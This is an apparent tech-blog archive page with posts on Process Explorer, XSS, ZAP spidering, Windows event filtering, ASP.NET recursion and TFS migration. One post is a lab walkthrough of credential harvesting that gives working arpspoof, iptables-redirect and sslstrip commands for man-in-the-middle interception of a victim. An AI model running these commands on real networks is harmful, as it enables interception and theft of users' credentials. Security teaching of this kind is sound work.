Computers, Programming, Technology, Music, Literature

Process Explorer vs Process Hacker–Part 1 of 2


Originally posted on chentiangemalc:

Process Explorer, the tool we’ve all come to love as “Task Manager on Steroids”, has been for many IT pros one of the essential tools in their troubleshooting toolkit. Process Explorer was originally released in 1998 under the name NTHandlEx. Here is a screenshot of version 1.22. Notice the lack of processes in Windows NT 4.0!


By version 2.01 it had been renamed to HandleEx, added some more process properties and a kill feature.


It wasn’t until 16 June 2001, when version 5.0 came out, that it got renamed to Process Explorer. (I was hoping to have a screenshot of this version as well but couldn’t find it anywhere…) In any case, as of May 2011 with version 14.12 the tool has come a long way to be one of the most advanced “task manager” tools available:


However an open source project has been working on a competing product since…


Written by gmaran23

September 28, 2014 at 1:27 pm

Posted in Uncategorized

Process Explorer vs Process Hacker–Part 2 of 2


Originally posted on chentiangemalc:

Continuing from Part 1 here we will now compare more advanced features of Process Explorer & Process Hacker.

Run As Options

Both Process Explorer and Process Hacker have “Run” options. Process Explorer has “Run” and “Run As Limited User”, while Process Hacker has “Run”, “Run As Limited User”, and “Run As”.

In both programs “Run As Limited User” will launch the process with “Low” integrity security level on Vista and higher.

However Process Hacker’s Run As is the most powerful with many special options…


User name can be any standard user name but also can include special accounts such as:


We can also select what “type”


Specific sessions can be targeted


as well as Desktops…


Finding Open Handles/DLLs

In Process Hacker this is found via the Hacker | Find Handles or DLLs menu option; in Process Explorer it is via Find | Find Handle or DLL.

The main difference here is…


Written by gmaran23

September 28, 2014 at 1:26 pm

Posted in Uncategorized

Devouring Security: Cross Site Scripting [XSS]






Agenda

- Risk, Stories & the news
- XSS Anatomy
- Untrusted Data Sources – Well, where did that come from?
- Shouldn’t it be called CSS instead?
- Types of XSS
  - Type 0 [DOM based]
  - Type 1 [Reflected or Non-persistent XSS]
  - Type 2 [Persistent or Stored XSS]
- Live Demo: XSS 101 with alert(‘hello XSS world’)
- Live Demo: Cookie Hijacking and Privilege Escalation
  - Face/Off with John Travolta and Nicolas Cage
- Live Demo: Let’s deploy some key loggers, huh?
- Mitigations
  - Input Sanitization
  - Popular Libraries for .NET, Java, PHP
    - Demo: Input sanitization
  - Whitelists (vs. Blacklists)
  - Output Encoding
    - Contextual
    - Demo: Output Encoding
  - Browser Protections & bypasses
  - Framework Protections & bypasses
  - Content Security Policy (CSP) in brief
- Secure Code reviews: Spot an XSS, How?
- Tools: Do we have an option?
- XSS Buzz and how to Fuzz
- Renowned Cheat sheets
- Further reading & References


Does your Autolock Domain Workstation policy fail sometimes? But why?



This article was originally published for and could be located at


The “Password Protect Screensaver” and “Screen Saver Timeout” settings controlled by group policy make the screen saver kick in after the specified interval of inactivity and, on resume, display the logon screen, so the workstation has to be unlocked.


Then, as the normal procedure if you are doing it for the first time, you run GPUPDATE /FORCE. The policy works as expected; however, if some users/managers keep quibbling about their workstation not getting locked after the specified interval, check whether any of the exceptions below apply.


  1. There is a video playing on YouTube or any website that uses a Flash-based or HTML5 video player. This must be the active window.
  2. There is a video playing in VLC or Windows Media Player. The application’s main window need not have the focus; it could be inactive (minimized, or hidden in the system tray).
  3. There is audio playing in VLC or Windows Media Player. The application’s main window need not have the focus; it could be inactive (minimized, or hidden in the system tray).
  4. There is an automated test running: desktop app automation or browser automation.
  5. A PowerPoint slideshow is in progress.


The moment a computer is joined to a domain the policy becomes effective; if it did not work, it could be because of the above exceptions or because the computer was not part of the domain. The exceptions apply because each of them lets the operating system know that the computer is not idle. If you think this is not the expected behaviour, think how ecstatic you’d be when your screen gets locked while you are enjoying a movie or are in the middle of a presentation.

Written by gmaran23

September 26, 2014 at 2:08 pm

Devouring Security: OWASP ZAP – Successfully Ajax Spidering a website with Authentication





OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)

0. Make sure you are proxying via Zap (I love FoxyProxy)

1. Identify the session cookie

1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools --> Options.. --> Http Sessions and add a session identifier]

1.2 go do some browsing

2. Set an active session from the Http Sessions tab

3. Identify and exclude the Log off request from the spider (and scanner, and proxy, if required)

Good luck with your Ajax spidering in ZAP!

Marudhamaran Gunasekaran


Also available on YouTube as an official OWASP ZAP video tutorial. Not so HD compared to Vimeo. Thanks to Simon Bennetts for feedback and suggestions.




Written by gmaran23

August 29, 2014 at 4:42 pm

Posted in hacks, kali, linux, OWASP, security, Sqli

Devouring Security: Sslstrip and arpspoofing for credential harvesting





You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?



Victim - Windows 7 –

Attacker – Kali linux –


arpspoof gateway –



• Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward


• Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>


arpspoof -i eth0 -t


• Set up iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


• Run sslstrip.

sslstrip -l <listenPort>
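As an added, defender-side example (not part of the original post), the check below looks for the ARP-cache symptoms that the arpspoof step above leaves on the victim's side: the gateway's MAC address changing between two snapshots of the neighbour table, and a single MAC answering for more than one IP. The `ip neigh` style snapshots, addresses and MACs are constructed for the example.

```python
"""Detect the ARP-cache symptoms of gateway spoofing.

Added example, not from the original post. It parses constructed
snapshots of a Linux `ip neigh` style table and flags two symptoms:
the gateway's MAC changing between snapshots, and one MAC claiming
several IP addresses (a host answering for the gateway as well as itself).
"""
import re
from collections import defaultdict

# Constructed `ip neigh` output: a clean snapshot and one taken after the
# host at .30 has started answering ARP for the gateway at .1.
BEFORE = """\
192.168.56.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.56.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.56.30 dev eth0 lladdr 00:11:22:33:44:30 REACHABLE
"""
AFTER = """\
192.168.56.1 dev eth0 lladdr 00:11:22:33:44:30 REACHABLE
192.168.56.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.56.30 dev eth0 lladdr 00:11:22:33:44:30 REACHABLE
"""

LINE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f:]{17}) (\S+)$", re.I)


def parse_neigh(text):
    """Return {ip: mac} from `ip neigh` lines; entries without lladdr are skipped."""
    table = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def gateway_mac_changed(before, after, gateway_ip):
    """True if the gateway's MAC differs between the two snapshots."""
    return before.get(gateway_ip) != after.get(gateway_ip)


def duplicate_macs(table):
    """Return {mac: [ips]} for MACs that answer for more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def analyse(before_text, after_text, gateway_ip):
    """Return a list of human-readable findings; empty means nothing suspicious."""
    before = parse_neigh(before_text)
    after = parse_neigh(after_text)
    findings = []
    if gateway_mac_changed(before, after, gateway_ip):
        findings.append(
            f"gateway {gateway_ip} MAC changed "
            f"{before.get(gateway_ip)} -> {after.get(gateway_ip)}"
        )
    for mac, ips in duplicate_macs(after).items():
        findings.append(f"MAC {mac} claims {', '.join(ips)}")
    return findings


if __name__ == "__main__":
    for finding in analyse(BEFORE, AFTER, "192.168.56.1"):
        print("ALERT:", finding)
```

On a real host the two snapshots would come from `ip neigh` (or `arp -n`) taken some time apart; a static ARP entry for the gateway, or switch-side dynamic ARP inspection, is the usual mitigation once this fires.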




Written by gmaran23

July 4, 2014 at 8:58 pm

Event Viewer – Filtering user events for forensics and audits



This article was originally published for and could be located at Event Viewer – Filtering user events for forensics and audits


Skip the story

Let’s say you are tracking down some user, or trying to find the users that logged in to a shared Windows workstation within a given timeline. Sounds downright easy with Event Viewer, right? Create a custom view or filter the current view of the Windows Logs\Security log, type the user account into the User: textbox, and you should be done. But it does not work, and by design it is not supposed to.


Fig: 1

When Event Viewer generates a query for the filter we created to look up a particular user’s activity, it actually puts the SID of that user into the query, and returns 0 events.


Fig: 2

Why did it return 0 events? It is fine that the user name typed into the User: textbox got converted to the SID, but shouldn’t it then have listed the activities for that user? If you go to Windows Logs\Security (without any filters), you’ll notice that there are actually many events logged for the user name (Account Name: ) that you want to filter on (ma is the user name in the sample).


Fig: 3

Picking a particular event, if you click Details to view the same event in XML or Friendly view, ma (the user we want to query) is actually the TargetUserName as far as the Event Viewer database is concerned, and TargetUserSid is the SID associated with the user ma.


Fig: 4


Fig: 5

Let’s pause for a moment and think back: if the SID for the user is called TargetUserSid in the Details view, shouldn’t the query that Event Viewer generated in Fig 2 actually use TargetUserSid instead of UserID?


That is,


  <Query Id="0" Path="Security">
    <Select Path="Security">*[System[Security[@TargetUserSid='S-1-5-21-458116588-1234567890-1874793278-1000']]]</Select>
  </Query>


instead of


  <Query Id="0" Path="Security">
    <Select Path="Security">*[System[Security[@UserID='S-1-5-21-458116588-1234567890-1874793278-1000']]]</Select>
  </Query>


Maybe I misunderstand, maybe I do not understand the Event Viewer terminology. I don’t know. All we expect is that when we type the User: we want to filter the logs for, Event Viewer does its own queries and its own conversions and I get to see the logs for that particular user. Since that does not work as expected, how do we actually see the Security logs for a user?


Use the XML below when you create the custom filter or when you filter an existing log path. Remember it is subjectUsername in the XML query.


  <Query Id="0" Path="Security">
    <Select Path="Security">*[EventData[Data[@Name='subjectUsername']='ma']]</Select>
  </Query>


If there is an easy way, let me know.

Also, below is a table of logon events and logon types explained by their code. The list is derived from a SANS poster named SANS-Digital-Forensics-and-Incident-Response-Poster-2012.pdf. I lost the hyperlink to that poster, but a more descriptive list can be found at –


Logon Type   Description
2            Logon via console
3            Network Logon
4            Batch Logon
5            Windows Service Logon
7            Credentials used to unlock screen
8            Network logon sending credentials (cleartext)
9            Different credentials used than logged on user
10           Remote interactive logon (RDP)
11           Cached credentials used to logon

Event ID (XP / Win 7)   Description
528 / 4624              Successful Logon
529 / 4625              Failed Logon
538 / 4634              Successful Logoff
540 / 4624              Successful Network Logon
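To make the UserID-versus-EventData difference and the table above concrete, here is an added Python example (it is not from the article and does not use the Event Viewer itself). It parses constructed Security-log records in the Windows event XML schema and applies the two kinds of filter the article contrasts: the GUI-generated one, which matches on the System/Security UserID attribute, and the hand-written one, which matches on an EventData Data element by name. The sample events, the user names ma and bob, and the logon sequence are made up; the SID is the one from the article's screenshots, and the description tables are the ones listed above.

```python
"""Filter Windows Security events by account, in Python over sample XML.

Added example, not from the article. The events below are constructed
records in the Windows event schema. Security-auditing events in this
sample carry an empty <Security /> element in <System>, so a filter on
System/Security/@UserID finds nothing, while matching on the
EventData Data elements (SubjectUserName, TargetUserName, TargetUserSid)
finds the user's events, which is the behaviour the article describes.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample: ma logs on at the console, logs off, and bob fails a
# network logon. The SID is the one shown in the article's filter.
MA_SID = "S-1-5-21-458116588-1234567890-1874793278-1000"
EVENTS_XML = f"""<Events xmlns="{NS['e']}">
  <Event>
    <System><EventID>4624</EventID><Security /></System>
    <EventData>
      <Data Name="SubjectUserName">-</Data>
      <Data Name="TargetUserName">ma</Data>
      <Data Name="TargetUserSid">{MA_SID}</Data>
      <Data Name="LogonType">2</Data>
    </EventData>
  </Event>
  <Event>
    <System><EventID>4634</EventID><Security /></System>
    <EventData>
      <Data Name="TargetUserName">ma</Data>
      <Data Name="TargetUserSid">{MA_SID}</Data>
      <Data Name="LogonType">2</Data>
    </EventData>
  </Event>
  <Event>
    <System><EventID>4625</EventID><Security /></System>
    <EventData>
      <Data Name="SubjectUserName">-</Data>
      <Data Name="TargetUserName">bob</Data>
      <Data Name="LogonType">3</Data>
    </EventData>
  </Event>
</Events>"""

# Logon type codes and event IDs from the table in the article.
LOGON_TYPES = {
    2: "Logon via console", 3: "Network Logon", 4: "Batch Logon",
    5: "Windows Service Logon", 7: "Credentials used to unlock screen",
    8: "Network logon sending credentials (cleartext)",
    9: "Different credentials used than logged on user",
    10: "Remote interactive logon (RDP)", 11: "Cached credentials used to logon",
}
# 4624 with LogonType 3 is the "Successful Network Logon" row of the table.
EVENT_IDS = {4624: "Successful Logon", 4625: "Failed Logon", 4634: "Successful Logoff"}


def parse_events(xml_text):
    """Return a list of {EventID, UserID, Data} dicts, one per <Event>."""
    events = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        system = ev.find("e:System", NS)
        security = system.find("e:Security", NS)
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        events.append({
            "EventID": int(system.findtext("e:EventID", namespaces=NS)),
            # This is what the GUI-generated *[System[Security[@UserID=...]]] tests.
            "UserID": security.get("UserID") if security is not None else None,
            "Data": data,
        })
    return events


def filter_by_system_userid(events, sid):
    """The GUI filter: match the System/Security UserID attribute."""
    return [e for e in events if e["UserID"] == sid]


def filter_by_data(events, name, value):
    """The hand-written filter: *[EventData[Data[@Name=name]=value]]."""
    return [e for e in events if e["Data"].get(name) == value]


def describe(event):
    """Decode an event into the article's table wording."""
    label = EVENT_IDS.get(event["EventID"], f"Event {event['EventID']}")
    logon_type = event["Data"].get("LogonType")
    if logon_type is not None:
        label += f" ({LOGON_TYPES.get(int(logon_type), 'logon type ' + logon_type)})"
    return label


if __name__ == "__main__":
    events = parse_events(EVENTS_XML)
    print("UserID filter:", len(filter_by_system_userid(events, MA_SID)), "events")
    for e in filter_by_data(events, "TargetUserName", "ma"):
        print(e["EventID"], describe(e))
```

Which Data element carries the account you are after depends on the event: the article's final query uses subjectUsername, while the Details view it shows names ma as the TargetUserName, so `filter_by_data` takes the element name as a parameter rather than fixing one.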

Written by gmaran23

July 4, 2014 at 8:41 pm

Let your IIS worker process crash with StackOverflowException



This article was originally published for and could be located at


Months back I posted a screenshot at, finally got time to write it down.


There was a Login page that did some sort of authorization check beyond authenticating the user, and displayed an Access Denied page for those who weren’t lucky enough. This was all done with ASP.NET MVC and the ASPX view engine, so there are things like Views, Partial Views, RenderPartial, and so on. The application was also heavily Ajax enabled, so partial views really seemed to fit in at many places that did not want to include master page content in the response text. There was a view file called AccessDenied.aspx that barked at unauthorized users. Things were working fine, and one day something broke: IIS was crashing without any meaningful error message. I lied, actually it did give a meaningful error message, something like – An unhandled exception of type ‘System.StackOverflowException’ occurred in mscorlib.dll. And the Call Stack showed some recursive function call. That is all there was to it.

Let’s look at a POC sample application below. Download the source from github –, Hit F5.




When you click the AccessDeniedForCrash page, this is what you see: An unhandled exception of type ‘System.StackOverflowException’ occurred in mscorlib.dll. If you look at the Call Stack window, there is a long run of the same method calling itself.




Let’s look at what happens when a view is requested, as in how the view engine probes the known locations to find the view definition. Click ViewDoesNotExist, and you would see an error page, that actually tells you the file locations that ASPX view engine probed to find a matching view. Pay attention to the search order where a .aspx file is searched first, and then the .ascx file.


Now, if you go back to the StackOverflowExceptionInASPXViewEngine solution, there are two files called AccessDeniedForCrash.ascx and AccessDeniedForCrash.aspx under ~/Views/Home.




The following code inside AccessDeniedForCrash.aspx calls the partial view AccessDeniedForCrash.ascx.


<asp:Content ID="Content3" ContentPlaceHolderID="FeaturedContent" runat="server">
    <section class="featured">
        <div class="content-wrapper">
            <hgroup class="title">
                <% Html.RenderPartial("AccessDeniedForCrash"); %>
            </hgroup>
        </div>
    </section>
</asp:Content>


A typical programming practice, right? You define subroutines and keep calling them as and when required. Reusability! You have created a partial view here (AccessDeniedForCrash.ascx) and kept calling the partial view inside the main view (AccessDeniedForCrash.aspx). But it was the ASPX view engine’s probing method that caused the recursive method call. The view engine reached AccessDeniedForCrash.aspx, as it came through the HomeController’s action method AccessDeniedForCrash. It then tried to find the partial view AccessDeniedForCrash.ascx, but always ended up with AccessDeniedForCrash.aspx because of the file search order; you know the rest of the story about recursion without an exit condition.

So, is this a programming error? Or a framework error? Or a ‘programmer did not understand the framework well’ error?
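To make the probing order concrete, here is an added Python model (not the project's code, and not the real WebFormViewEngine) of the search order the error page shows, .aspx before .ascx, applied to the two files from the post. The original pair recurses until a depth guard standing in for the exhausted stack fires; the same pair with the partial given a distinct name renders. The file contents are constructed, and the `_AccessDenied` name and the depth limit are assumptions made for the example.

```python
"""Model of the ASPX view engine's probe order that produced the recursion.

Added example, not the project's code. `probe` mimics the search order the
error page lists (Views/<controller>/<name>.aspx before <name>.ascx) for
partials too, which is what turns RenderPartial("AccessDeniedForCrash")
inside AccessDeniedForCrash.aspx into a call to itself.
"""
import re

PARTIAL = re.compile(r'<% Html\.RenderPartial\("([^"]+)"\); %>')

# Constructed in-memory "Views/Home" folder mirroring the post's two files.
VIEWS_BROKEN = {
    "AccessDeniedForCrash.aspx": '<h1>Denied</h1><% Html.RenderPartial("AccessDeniedForCrash"); %>',
    "AccessDeniedForCrash.ascx": "<p>You do not have access.</p>",
}
# The same pair with the partial under a distinct name (assumed fix for the example).
VIEWS_FIXED = {
    "AccessDeniedForCrash.aspx": '<h1>Denied</h1><% Html.RenderPartial("_AccessDenied"); %>',
    "_AccessDenied.ascx": "<p>You do not have access.</p>",
}

SEARCH_ORDER = (".aspx", ".ascx")  # order shown on the post's probing error page


def probe(views, name):
    """Return the first file for `name` in the engine's search order."""
    for ext in SEARCH_ORDER:
        if name + ext in views:
            return name + ext
    tried = [name + ext for ext in SEARCH_ORDER]
    raise FileNotFoundError(f"no view for {name}, tried {tried}")


def render(views, name, depth=0, max_depth=50):
    """Render a view, expanding RenderPartial calls recursively.

    max_depth stands in for the real engine's stack running out; the real
    engine has no such guard and dies with StackOverflowException.
    """
    if depth > max_depth:
        raise RecursionError(f"RenderPartial recursion while rendering {name}")
    template = views[probe(views, name)]
    return PARTIAL.sub(
        lambda m: render(views, m.group(1), depth + 1, max_depth), template
    )


def render_outcome(views, name):
    """Return ("ok", html) or ("stackoverflow", message) for a top-level view."""
    try:
        return "ok", render(views, name)
    except RecursionError as exc:
        return "stackoverflow", str(exc)


if __name__ == "__main__":
    print("broken:", render_outcome(VIEWS_BROKEN, "AccessDeniedForCrash"))
    print("fixed: ", render_outcome(VIEWS_FIXED, "AccessDeniedForCrash"))
```

The one-line check that matters for review is `probe`: any partial whose name collides with a full view in the same folder resolves to the full view first, so naming partials distinctly (or putting them in Views/Shared) removes the cycle.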




Written by gmaran23

June 30, 2014 at 7:16 pm

Restoring TFS services after host name and domain binding changes



This article was originally published for and could be located at


I have a local TFS server set up for testing CI integration of certain tools. The database storage (SQL Server 2012 Express), the application tier, the build agent, the controller, everything is set up on localhost. I am working with TFS 2012, with the TFS services running under <<computername>>\TfsUser.


The computer was recently migrated to another domain, which involved a computer name change and, obviously, the domain name change itself. That’s it. TFS services started returning 503 Service Unavailable. The TFS application pool was stopped and never started again. The TFS Administration Console kept throwing all sorts of error messages. I was not prepared for any of these changes, and it took me some time to fix all of them and get the CI functionality working flawlessly again. Ironically, all this happened right after I happily blogged about Migrate user profiles to new domain account in a jiffy with Profwiz. But here I am, documenting my steps one by one. If your (local) TFS server installation has been through a domain change, you may find these steps helpful. You are best off following the steps sequentially. All the steps involve changing the old machine name to the new machine name and fixing the Windows identities.


1. Verify/Update the Application Tier web.config

Navigate to the TFS Application Tier Web Services folder, and edit the applicationDatabase appSettings value. The Data Source should be <<newcomputername>>\databaseServer.

C:\Program Files\Microsoft Team Foundation Server 11.0\Application Tier\Web Services\web.config



2. Verify/Update the TFS sql server database Logins

I use <<machinename>>\TfsUser as an admin console user. Connect to the SQL Server where the TFS configurations are saved and remove the logins with the old machine name. (If a login with the old machine name still exists, it will result in a SID conflict later during other stages.) Add new logins with the new <<machinename>> and give them sysadmin permissions.

“TF255507: The security identifier (SID) for the following SQL Server login conflicts with a specified domain or workgroup account: <<oldcomputername>>\user. The domain or workgroup account is: <<newcomputername>>\user.  The server selected to host the databases for Team Foundation Server is: <<newcomputername>>\sql2012express.
You can resolve this issue by renaming the conflicting login.”



3. Verify/Update the Tfs Application Pool identities

Make sure the TFS application pools Microsoft Team Foundation Server Application Pool and Microsoft Team Foundation Server Message Queue Application Pool in IIS run under <<newcomputername>>\<<yourIdentity>>. In my case it is TfsUser.



4. iisreset at will. A couple of times during the entire troubleshooting process.


Try browsing to http://localhost:9000/tfs (or wherever your http://hostname:portnumber/tfs is); you should be done here if you get the TFS Getting Started screen.

5. Dealing with Sync error for identity

However, if you encounter ‘The trust relationship between this workstation and the primary domain failed’, or the errors below, proceed.

TF53010: The following error has occurred in a Team Foundation component or extension:
Date (UTC): 15-05-2014 18:01:13
Machine: <<machinename>>
Application Domain: TfsJobAgent.exe
Assembly: Microsoft.TeamFoundation.Framework.Server, Version=, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a; v4.0.30319
Service Host: 
Process Details:
  Process Name: TFSJobAgent
  Process Id: 3020
  Thread Id: 4640
  Account name: <<machinename>>\TfsUser

Detailed Message: TF200035: One or more errors occurred when Team Foundation Server attempted to synchronize the following identity: Administrators. Number of errors that occurred: 1.
Sync error for identity: Administrators
The trust relationship between this workstation and the primary domain failed
   at Microsoft.TeamFoundation.Framework.Common.SidIdentityHelper.ResolveSid(SecurityIdentifierInfo securityIdInfo, String& domain, String& userName, AccountType& type, Boolean& isDeleted, Boolean& migrated)
   at Microsoft.VisualStudio.Services.Identity.WindowsProvider.ResolveIdentity(IdentityDescriptor descriptor, String providerInfo, AccountSubType& subType, Boolean& migrated)
   at Microsoft.VisualStudio.Services.Identity.WindowsProvider.TrySyncIdentity(IdentityDescriptor descriptor, Boolean includeMembership, String providerInfo, TeamFoundationRequestContext requestContext, SyncErrors syncErrors, Identity& identity)
   at Microsoft.VisualStudio.Services.Identity.IdentitySynchronizer.SyncOneGroupMembership(TeamFoundationRequestContext requestContext, Identity groupToSync)





Ask your System administrator to Reset the computer account in AD. That is right click on the computer and do Reset Account.




Then, Start –> Run –> sysdm.cpl, and hit the Network ID… button. Follow the steps to join the computer to a domain. This step requires a Domain Admins account, so use your System Administrator’s or AD Administrator’s help, and complete the Join a Domain or Workgroup wizard.


Doing a Reset Account on AD computer account, and Joining it again to the domain via Network ID… made my ‘The trust relationship between this workstation and the primary domain failed’ error disappear.

6. Verify/Update Application Tier’s Notification URL, Server URL, Web Access URL


In Team Foundation Server Administration Console, Click Change URLs in Application Tier Summary, and update the Notification URL, Server URL to the <<newmachinename>>.



7. Unregister/Register the Build service with new machine name

Unregister the build service that uses the <<oldcomputername>>. Register a build service with the <<newcomputername>>. And do the same for the agent and the controller.




That should be it. At least those are the steps I took to get my TFS installation working again. If you want to check the check-in and build service as well, follow the steps below.

8. Fixing the workspace conflict in Visual Studio TFS Client

A simple solution by Anand is to remove the current workspace the solution was bound to, so that the VS TFS client automatically creates a new one. I did not have any pending changes.

Open Developer Command Prompt for VS2012, run

C:\Program Files (x86)\Microsoft Visual Studio 11.0>tf workspaces


to see existing workspaces, and remove the workspaces bound to the <<oldcomputername>> with

C:\Program Files (x86)\Microsoft Visual Studio 11.0>tf workspaces /remove:<<oldcomputername>>


TFS client should connect fine now, and should have created a new workspace for you. Map the source control to the local directory.


Edit your build definition to update the Build Controller: to the newly created build controller.



Check in, and see your CI working again with all tests and other configured tools.



